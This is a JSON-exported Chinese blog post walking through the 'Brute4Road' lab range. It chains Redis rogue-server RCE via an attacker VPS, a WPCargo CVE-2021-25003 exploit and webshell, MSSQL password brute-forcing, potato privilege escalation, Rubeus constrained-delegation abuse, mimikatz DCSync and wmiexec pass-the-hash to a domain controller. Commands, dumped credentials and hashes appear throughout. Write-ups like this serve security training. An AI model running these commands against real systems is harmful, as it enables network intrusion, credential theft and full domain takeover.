{"id":241,"date":"2023-05-26T16:36:32","date_gmt":"2023-05-26T08:36:32","guid":{"rendered":"https:\/\/zysgmzb.club\/?p=241"},"modified":"2023-05-26T20:01:02","modified_gmt":"2023-05-26T12:01:02","slug":"%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%e9%9d%b6%e5%9c%ba%e8%ae%b0%e5%bd%95-brute4road","status":"publish","type":"post","link":"https:\/\/zysgmzb.club\/index.php\/archives\/241","title":{"rendered":"\u6625\u79cb\u4e91\u5883\u9776\u573a\u8bb0\u5f55-Brute4Road"},"content":{"rendered":"<blockquote>\n<p>\u4e91\u763e\u72af\u4e86\uff0c\u4e00\u79d2\u628a\u6625\u79cb\u4e91\u5883\u6253\u5f00<\/p>\n<\/blockquote>\n<p>\u5165\u53e3<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/pic1.imgdb.cn\/item\/64704862f024cca1731157e1.jpg\" alt=\"\" \/><\/p>\n<p>\u7aef\u53e3\u626b\u63cf<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/pic1.imgdb.cn\/item\/647048cff024cca173121504.jpg\" alt=\"\" \/><\/p>\n<p>6379\u6709redis\u7684\u672a\u6388\u6743\uff0cftp\u8fd8\u6709\u533f\u540d\u767b\u5f55<\/p>\n<p>ftp\u91cc\u9762\u53ea\u6709\u4e00\u4e2a\u7a7a\u7684pub\u6587\u4ef6\u5939\uff0c\u6ca1\u522b\u7684\u4e86\uff0c\u518d\u770b\u770bredis --&gt; <a href=\"https:\/\/blog.csdn.net\/qinglongSpring\/article\/details\/128175195\">redis\u547d\u4ee4<\/a><\/p>\n<p>redis\u91cc\u9762\u4e5f\u5565\u4e5f\u6ca1\u6709<\/p>\n<p>\u627e\u5230\u4e86<a href=\"https:\/\/github.com\/n0b0dyCN\/redis-rogue-server\">\u5927\u4f6c\u7684\u9879\u76ee<\/a><\/p>\n<p>exp\u76f4\u63a5\u62ff\u4e0b<\/p>\n<pre class=\"prettyprint linenums\" ><code>python3 redis-rogue-server.py --rhost=47.92.86.223 --lhost=VPS-IP<\/code><\/pre>\n<p>\u6ce8\u610f\u8fd9\u4e2aexp\u5982\u679c\u4e0d\u60f3\u6539\u4ee3\u7801\u7684\u8bdd\u4e5f\u8981\u5728vps\u4e0a\u8fd0\u884c\uff0c\u4e0d\u7136\u4f1a\u5361\u5728Setting dbfilename\u8fd9\u91cc\uff0c\u60f3\u77e5\u9053\u4e3a\u4ec0\u4e48\u53ef\u4ee5\u53bb\u67e5\u770b\u4ee3\u7801<\/p>\n<p>\u6210\u529f\u6536\u5230shell<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/pic1.imgdb.cn\/item\/64704de7f024cca1731aac7b.jpg\" alt=\"\" \/><\/p>\n<p>\u76f4\u63a5\u4e0a\u9a6c\u4e0a\u7ebf\u5230viper\u65b9\u4fbf\u540e\u7eed\u64cd\u4f5c<\/p>\n<p>ifconfig<\/p>\n<pre class=\"prettyprint linenums\" ><code>eth0: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500\n        inet 172.22.2.7  netmask 255.255.0.0  broadcast 172.22.255.255\n        inet6 fe80::216:3eff:fe0a:aef6  prefixlen 64  scopeid 0x20&lt;link&gt;\n        ether 00:16:3e:0a:ae:f6  txqueuelen 1000  (Ethernet)\n        RX packets 111385  bytes 149022513 (142.1 MiB)\n        RX errors 0  dropped 0  overruns 0  frame 0\n        TX packets 21876  bytes 5471977 (5.2 MiB)\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\n\nlo: flags=73&lt;UP,LOOPBACK,RUNNING&gt;  mtu 65536\n        inet 127.0.0.1  netmask 255.0.0.0\n        inet6 ::1  prefixlen 128  scopeid 0x10&lt;host&gt;\n        loop  txqueuelen 1000  (Local Loopback)\n        RX packets 0  bytes 0 (0.0 B)\n        RX errors 0  dropped 0  overruns 0  frame 0\n        TX packets 0  bytes 0 (0.0 B)\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0<\/code><\/pre>\n<p>\u518d\u4f20fscan\u626b\u5185\u7f51<\/p>\n<pre class=\"prettyprint linenums\" ><code>(icmp) Target 172.22.2.3      is alive\n(icmp) Target 172.22.2.7      is alive\n(icmp) Target 172.22.2.16     is alive\n(icmp) Target 172.22.2.18     is alive\n(icmp) Target 172.22.2.34     is alive\n[*] Icmp alive hosts len is: 5\n172.22.2.16:445 open\n172.22.2.3:445 open\n172.22.2.34:139 open\n172.22.2.16:139 open\n172.22.2.18:139 open\n172.22.2.34:135 open\n172.22.2.3:139 open\n172.22.2.16:135 open\n172.22.2.3:135 open\n172.22.2.16:80 open\n172.22.2.18:80 open\n172.22.2.7:80 open\n172.22.2.18:22 open\n172.22.2.7:21 open\n172.22.2.16:1433 open\n172.22.2.34:445 open\n172.22.2.18:445 open\n172.22.2.7:22 open\n172.22.2.7:6379 open\n172.22.2.3:88 open\n[*] alive ports len is: 20\nstart vulscan\n[*] WebTitle: http:\/\/172.22.2.7         code:200 len:4833   title:Welcome to CentOS\n[*] NetInfo:\n[*]172.22.2.34\n   [-&gt;]CLIENT01\n   [-&gt;]172.22.2.34\n[*] NetInfo:\n[*]172.22.2.3\n   [-&gt;]DC\n   [-&gt;]172.22.2.3\n[*] NetBios: 172.22.2.34     XIAORANG\\CLIENT01              \n[*] NetInfo:\n[*]172.22.2.16\n   [-&gt;]MSSQLSERVER\n   [-&gt;]172.22.2.16\n[*] 172.22.2.3  (Windows Server 2016 Datacenter 14393)\n[*] 172.22.2.16  (Windows Server 2016 Datacenter 14393)\n[*] WebTitle: http:\/\/172.22.2.16        code:404 len:315    title:Not Found\n[*] NetBios: 172.22.2.16     MSSQLSERVER.xiaorang.lab            Windows Server 2016 Datacenter 14393 \n[*] NetBios: 172.22.2.3      [+]DC DC.xiaorang.lab               Windows Server 2016 Datacenter 14393 \n[*] NetBios: 172.22.2.18     WORKGROUP\\UBUNTU-WEB02         \n[+] ftp:\/\/172.22.2.7:21:anonymous \n   [-&gt;]pub\n[*] WebTitle: http:\/\/172.22.2.18        code:200 len:57738  title:\u53c8\u4e00\u4e2aWordPress\u7ad9\u70b9<\/code><\/pre>\n<p>\u4e00\u5171\u4e94\u53f0\u673a\u5668\uff0c\u6982\u62ec\u4e00\u4e0b<\/p>\n<pre class=\"prettyprint linenums\" ><code>172.22.2.3      \u57df\u63a7\n172.22.2.7      \u62ff\u4e0b\n172.22.2.16     mssql\n172.22.2.18     wordpress\n172.22.2.34     <\/code><\/pre>\n<p>\u53ef\u4ee5\u770b\u5230\u6709\u4e24\u4e2a\u53ef\u4ee5\u5229\u7528\u7684\u670d\u52a1\uff0c\u4f46\u662f\u5148\u628a\u5f53\u524d\u673a\u5668flag\u62ff\u4e86<\/p>\n<p>\u624b\u52a8\u679a\u4e3e\u4e00\u4e0b\uff0c\u53d1\u73b0base64\u6709suid\u6743\u9650\uff0c\u76f4\u63a5\u8bfb<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/pic1.imgdb.cn\/item\/64705116f024cca1731fe922.jpg\" alt=\"\" \/><\/p>\n<p>viper\u505a\u4e2a\u4ee3\u7406\u5148<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/pic1.imgdb.cn\/item\/647051c2f024cca17320f117.jpg\" alt=\"\" \/><\/p>\n<p>\u8fde\u63a5\u6210\u529f\uff0cwpscan\u626b\u4e00\u4e0b<\/p>\n<pre class=\"prettyprint linenums\" ><code>p4 wpscan --url http:\/\/172.22.2.18\/ --api-token \u4f60\u7684api<\/code><\/pre>\n<p>\u4e00\u773c\u63d2\u4ef6\u6709\u95ee\u9898<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/pic1.imgdb.cn\/item\/647052fff024cca17322fe0e.jpg\" alt=\"\" \/><\/p>\n<p>\u76f4\u63a5\u5f00\u627e\u7b2c\u4e00\u4e2arce\u7684poc<\/p>\n<p><a href=\"https:\/\/github.com\/biulove0x\/CVE-2021-25003\">https:\/\/github.com\/biulove0x\/CVE-2021-25003<\/a><\/p>\n<pre class=\"prettyprint linenums\" ><code>p4 python3 WpCargo.py -t http:\/\/172.22.2.18\/<\/code><\/pre>\n<p>rce\u6210\u529f<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/pic1.imgdb.cn\/item\/64705533f024cca17327412e.jpg\" alt=\"\" \/><\/p>\n<p>\u76f4\u63a5\u5199\u4e2a\u4e00\u53e5\u8bdd\u5230\u5f53\u524d\u76ee\u5f55\uff0c\u7136\u540e\u8681\u5251\u8fde\u63a5<\/p>\n<p>\u770b\u4e00\u773cwp-config.php\uff0c\u987a\u624b\u5728\u4e4b\u524d\u7684\u673a\u5668\u4e0a\u505a\u4e2a\u7aef\u53e3\u8f6c\u53d1\u628a\u8fd9\u53f0\u673a\u5668\u4e0a\u7ebf\u5230viper<\/p>\n<p>\u62ff\u5230\u8d26\u53f7\u5bc6\u7801<\/p>\n<pre class=\"prettyprint linenums\" ><code>\/** Database username *\/\ndefine( &#039;DB_USER&#039;, &#039;wpuser&#039; );\n\n\/** Database password *\/\ndefine( &#039;DB_PASSWORD&#039;, &#039;WpuserEha8Fgj9&#039; );<\/code><\/pre>\n<p>\u76f4\u63a5\u8681\u5251\u770b\u4e00\u4e0b\u6570\u636e\u5e93<\/p>\n<p>\u62ff\u5230flag2<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/pic1.imgdb.cn\/item\/6470592cf024cca1732ee01e.jpg\" alt=\"\" \/><\/p>\n<p>\u540c\u65f6\u4e0a\u9762\u7684S0meth1ng_y0u_m1ght_1ntereSted\u91cc\u9762\u8fd8\u6709\u4e00\u4e2a\u5bc6\u7801\u8868<\/p>\n<p>\u4e00\u5171\u6709999\u4e2a\u5bc6\u7801\u8fd9\u91cc\u5c31\u4e0d\u653e\u4e86<\/p>\n<p>\u56de\u987e\u4e4b\u524d\u7684\u7aef\u53e3\u626b\u63cf\u7ed3\u679c\uff0c\u731c\u6d4b\u662fmssql\u7684\u5bc6\u7801\u8868<\/p>\n<p>\u76f4\u63a5fscan\u7206\u7834\u4e00\u624b<\/p>\n<pre class=\"prettyprint linenums\" ><code>fscan -h 172.22.2.16 -m mssql -pwdf 1.txt<\/code><\/pre>\n<p>\u62ff\u5230\u5bc6\u7801<\/p>\n<pre class=\"prettyprint linenums\" ><code>start infoscan\ntrying RunIcmp2\nThe current user permissions unable to send icmp packets\nstart ping\n(icmp) Target 172.22.2.16     is alive\n[*] Icmp alive hosts len is: 1\n172.22.2.16:1433 open\n[*] alive ports len is: 1\nstart vulscan\n[+] mssql:172.22.2.16:1433:sa ElGNkOiC\n\u5df2\u5b8c\u6210 1\/1\n[*] \u626b\u63cf\u7ed3\u675f,\u8017\u65f6: 655.654931ms<\/code><\/pre>\n<p>MDUT\u76f4\u63a5\u8fde\u63a5\uff0c\u4e5f\u505a\u4e00\u624b\u4e0a\u7ebf<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/pic1.imgdb.cn\/item\/64705cdef024cca17335268b.jpg\" alt=\"\" \/><\/p>\n<p>\u4e0a\u7ebf\u4e4b\u540e\u65e0\u8111\u751c\u571f\u8c46\uff0c\u63d0\u6743\u6210\u529f\uff0c\u76f4\u63a5\u4e0a\u7ebfsystem\uff0c\u62ff\u5230flag3<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/pic1.imgdb.cn\/item\/64705f5af024cca1733879fe.jpg\" alt=\"\" \/><\/p>\n<p>viper\u7684msf\u91cc\u6293\u4e00\u624b\u57df\u5185\u7528\u6237hash<\/p>\n<pre class=\"prettyprint linenums\" ><code>MSSQLSERVER$   XIAORANG     a6c742dc3079e8090e03ffe3c50cf674\nMSSQLSERVER$   XIAORANG     cea3e66a2715c71423e7d3f0ff6cd352<\/code><\/pre>\n<p>\u7528Rubeus\u7533\u8bf7\u8bbf\u95ee\u81ea\u8eab\u7684\u670d\u52a1\u7968\u636e<\/p>\n<pre class=\"prettyprint linenums\" ><code>.\\Rubeus.exe asktgt \/user:MSSQLSERVER$ \/rc4:a6c742dc3079e8090e03ffe3c50cf674 \/domain:xiaorang.lab \/dc:DC.xiaorang.lab \/nowrap<\/code><\/pre>\n<p>\u62ff\u5230\u7968\u636e<\/p>\n<pre class=\"prettyprint linenums\" ><code>   ______        _                      \n  (_____ \\      | |                     \n   _____) )_   _| |__  _____ _   _  ___ \n  |  __  \/| | | |  _ \\| ___ | | | |\/___)\n  | |  \\ \\| |_| | |_) ) ____| |_| |___ |\n  |_|   |_|____\/|____\/|_____)____\/(___\/\n\n  v2.1.2 \n\n[*] Action: Ask TGT\n\n[*] Using rc4_hmac hash: a6c742dc3079e8090e03ffe3c50cf674\n[*] Building AS-REQ (w\/ preauth) for: &#039;xiaorang.lab\\MSSQLSERVER$&#039;\n[*] Using domain controller: 172.22.2.3:88\n[+] TGT request successful!\n[*] base64(ticket.kirbi):\n\n      doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE3jL\/Z8Oy6ClEMXCoRwLjpHbQYIdU\/WtGjPj9dj67z2y87e7mgTLkMT5Bzw107e8YgY\/CSvUUwy1X8W+9Hmp9ejxgAW7kKsAVMnY8kx2peDgV+vL+HfpmAfDWljZPDve5ZR2+dENFkzO82dbzn1cE+38ubWX8lGAJdOfvYHqbhQs1cErKaLQs2c4XHEKRUTryROkvjM4m5BZt\/FAwFbVEF0ALCdNQDOI3rzRAsfjDZhHLSBy9SGqIkPZsGwIzxtL3dVqmO7JevAvrh3eRNskCyNEuq6F4uAL1jJPVJjMugtc+9\/IPCzwtLIGy42o2m9LnR7s5g5hhgQYLMqZrVzw6SE5qNrtrAeBdc5GN8B0iZHgX95QEB9rrVtT6YBhtKs6SLLkTw31B1p8NZFFUe0wH26YHjNf1tOTEcTylh+WfRCfGze\/aIY7lvAJ73ZXrGYKW\/3qBO9mgE97RnUK1fjtsXjQ2WK0qsOOmm6A4bxn3t25VlBdTgw7AeLICh5cJ889sFGRss7MZSrS6lMiPFRTa2SXS\/l2Phk\/6OU+W15ZLZ4G9XQUZ814rY28WYg7Txc2T003aH4Usxc2XTb13W4lCNvrwF1AxW6\/8\/IgdUBB3nYPQsT4Fjoi4BHvZtp45nD51OnqxD0FGCLxvumjNhmeb40nZJAUEJkP4aC3OQ\/mWF0hmfyzD17kKF6a3QEzLh4zjUAbceyU91\/zCuljBtD3vVHN3WrXmwXF3VTYVELUmMSunTQxMCSyXUb6LFBocLhKuez\/53H4DkMN+8CjA7UcTHCYoZI5H+Vu7s8znZQIc75dH+h0fE2tzadH4a+44Ew+LOuTlUjqKlEcOz9wkJgsYaEo6rnBHMbcWSH04Vxbx6RqUwgYJ3eFi8lavUWoLFp6Y\/PcWvfOPWYVYT8QUuBNzqmwpTfVHN8e2MN6zcBaV0gknTqEME3oY49wJX\/A8RCFlgPSmchvbc8dzNk5Pqk0vJcLQ0XjLGH1Orhmgytlri5s2jpIawDM4U\/IDVhEQoh13LDg9VVmDX3OU5CoTWUxL0QzXm4EMcL5Qmdi05gcsQrEI82YzM7cmAQsAvNvktja1hS\/0o4CkXANoGWmcsic9viMmQR0QhbM7y2b9zgvmmJMItbS8HlWxTjYTMQeTkHfO+VGbN7bUzvv6ErbSnP65UWlqxgXxIKv9vnRatUgbEA2+sZR+xVbeDowuit54Rr2CGaOpaHQye6IOrmAJiKJD5Ds2vbrNBHNFtWFucEkx91uhBEcB8J4tcKO+8Z\/zhUwOtCSPUDec\/Vpy5OTgNYCkZ98yXCTc21xm++eSOoZK5DwNc9FgzI70sXuw+jNuLILeoSnCbsw2VDFBRta3\/Q+n1tJlI8qk55HU1vNLp0atmhIVao59tmatNRhveJeKxb8UzNe8BHSE2RkvDuCkp7Pl9TatBWWo0Q7UEmZQ2Ry9tMVi1qFTI6u5IgyNQeAcCjgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBCq9lNtbiOuC2ROsd1npy9koQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDIzMDUyNjA4MDkwOFqmERgPMjAyMzA1MjYxODA5MDhapxEYDzIwMjMwNjAyMDgwOTA4WqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg==\n\n  ServiceName              :  krbtgt\/xiaorang.lab\n  ServiceRealm             :  XIAORANG.LAB\n  UserName                 :  MSSQLSERVER$\n  UserRealm                :  XIAORANG.LAB\n  StartTime                :  2023\/5\/26 16:09:08\n  EndTime                  :  2023\/5\/27 2:09:08\n  RenewTill                :  2023\/6\/2 16:09:08\n  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable\n  KeyType                  :  rc4_hmac\n  Base64(key)              :  qvZTbW4jrgtkTrHdZ6cvZA==\n  ASREP (key)              :  A6C742DC3079E8090E03FFE3C50CF674<\/code><\/pre>\n<p>\u7136\u540e\u6ce8\u5165\u7968\u636e<\/p>\n<pre class=\"prettyprint linenums\" ><code>.\\Rubeus.exe s4u \/impersonateuser:Administrator \/msdsspn:LDAP\/DC.xiaorang.lab \/dc:DC.xiaorang.lab \/ptt \/ticket:doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE3jL\/Z8Oy6ClEMXCoRwLjpHbQYIdU\/WtGjPj9dj67z2y87e7mgTLkMT5Bzw107e8YgY\/CSvUUwy1X8W+9Hmp9ejxgAW7kKsAVMnY8kx2peDgV+vL+HfpmAfDWljZPDve5ZR2+dENFkzO82dbzn1cE+38ubWX8lGAJdOfvYHqbhQs1cErKaLQs2c4XHEKRUTryROkvjM4m5BZt\/FAwFbVEF0ALCdNQDOI3rzRAsfjDZhHLSBy9SGqIkPZsGwIzxtL3dVqmO7JevAvrh3eRNskCyNEuq6F4uAL1jJPVJjMugtc+9\/IPCzwtLIGy42o2m9LnR7s5g5hhgQYLMqZrVzw6SE5qNrtrAeBdc5GN8B0iZHgX95QEB9rrVtT6YBhtKs6SLLkTw31B1p8NZFFUe0wH26YHjNf1tOTEcTylh+WfRCfGze\/aIY7lvAJ73ZXrGYKW\/3qBO9mgE97RnUK1fjtsXjQ2WK0qsOOmm6A4bxn3t25VlBdTgw7AeLICh5cJ889sFGRss7MZSrS6lMiPFRTa2SXS\/l2Phk\/6OU+W15ZLZ4G9XQUZ814rY28WYg7Txc2T003aH4Usxc2XTb13W4lCNvrwF1AxW6\/8\/IgdUBB3nYPQsT4Fjoi4BHvZtp45nD51OnqxD0FGCLxvumjNhmeb40nZJAUEJkP4aC3OQ\/mWF0hmfyzD17kKF6a3QEzLh4zjUAbceyU91\/zCuljBtD3vVHN3WrXmwXF3VTYVELUmMSunTQxMCSyXUb6LFBocLhKuez\/53H4DkMN+8CjA7UcTHCYoZI5H+Vu7s8znZQIc75dH+h0fE2tzadH4a+44Ew+LOuTlUjqKlEcOz9wkJgsYaEo6rnBHMbcWSH04Vxbx6RqUwgYJ3eFi8lavUWoLFp6Y\/PcWvfOPWYVYT8QUuBNzqmwpTfVHN8e2MN6zcBaV0gknTqEME3oY49wJX\/A8RCFlgPSmchvbc8dzNk5Pqk0vJcLQ0XjLGH1Orhmgytlri5s2jpIawDM4U\/IDVhEQoh13LDg9VVmDX3OU5CoTWUxL0QzXm4EMcL5Qmdi05gcsQrEI82YzM7cmAQsAvNvktja1hS\/0o4CkXANoGWmcsic9viMmQR0QhbM7y2b9zgvmmJMItbS8HlWxTjYTMQeTkHfO+VGbN7bUzvv6ErbSnP65UWlqxgXxIKv9vnRatUgbEA2+sZR+xVbeDowuit54Rr2CGaOpaHQye6IOrmAJiKJD5Ds2vbrNBHNFtWFucEkx91uhBEcB8J4tcKO+8Z\/zhUwOtCSPUDec\/Vpy5OTgNYCkZ98yXCTc21xm++eSOoZK5DwNc9FgzI70sXuw+jNuLILeoSnCbsw2VDFBRta3\/Q+n1tJlI8qk55HU1vNLp0atmhIVao59tmatNRhveJeKxb8UzNe8BHSE2RkvDuCkp7Pl9TatBWWo0Q7UEmZQ2Ry9tMVi1qFTI6u5IgyNQeAcCjgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBCq9lNtbiOuC2ROsd1npy9koQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDIzMDUyNjA4MDkwOFqmERgPMjAyMzA1MjYxODA5MDhapxEYDzIwMjMwNjAyMDgwOTA4WqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg==<\/code><\/pre>\n<p>\u7136\u540emimikatz\u518ddump<\/p>\n<pre class=\"prettyprint linenums\" ><code>lsadump::dcsync \/domain:xiaorang.lab \/user:Administrator<\/code><\/pre>\n<p>\u62ff\u5230hash\uff0c\u7136\u540e\u76f4\u63a5wmiexec\u62ff\u5230flag4<\/p>\n<pre class=\"prettyprint linenums\" ><code>p4 python3 wmiexec.py -hashes :1a19251fbd935969832616366ae3fe62 Administrator@172.22.2.3<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/pic1.imgdb.cn\/item\/64706d55f024cca1734cb5d6.jpg\" alt=\"\" \/><\/p>\n<p>\u7ed3\u675f<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u4e91\u763e\u72af\u4e86\uff0c\u4e00\u79d2\u628a\u6625\u79cb\u4e91\u5883\u6253\u5f00 \u5165\u53e3 \u7aef\u53e3\u626b\u63cf 6379\u6709redis\u7684\u672a\u6388\u6743\uff0cftp\u8fd8\u6709\u533f\u540d\u767b\u5f55 ftp\u91cc\u9762\u53ea\u6709\u4e00\u4e2a\u7a7a\u7684pub\u6587\u4ef6\u5939\uff0c\u6ca1\u522b\u7684\u4e86\uff0c\u518d\u770b\u770bredis &#8211;&gt; redis\u547d\u4ee4 redis\u91cc\u9762\u4e5f\u5565\u4e5f\u6ca1\u6709 \u627e\u5230\u4e86\u5927\u4f6c\u7684\u9879\u76ee exp\u76f4\u63a5\u62ff\u4e0b python3 redis-rogue-server.py &#8211;rhost=47.92.86.223 &#8211;lhost=VPS-IP \u6ce8\u610f\u8fd9\u4e2aexp\u5982\u679c [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1,3],"tags":[],"class_list":["post-241","post","type-post","status-publish","format-standard","hentry","category-wp","category-learn"],"_links":{"self":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/241","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/comments?post=241"}],"version-history":[{"count":2,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/241\/revisions"}],"predecessor-version":[{"id":243,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/241\/revisions\/243"}],"wp:attachment":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/media?parent=241"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/categories?post=241"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/tags?post=241"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}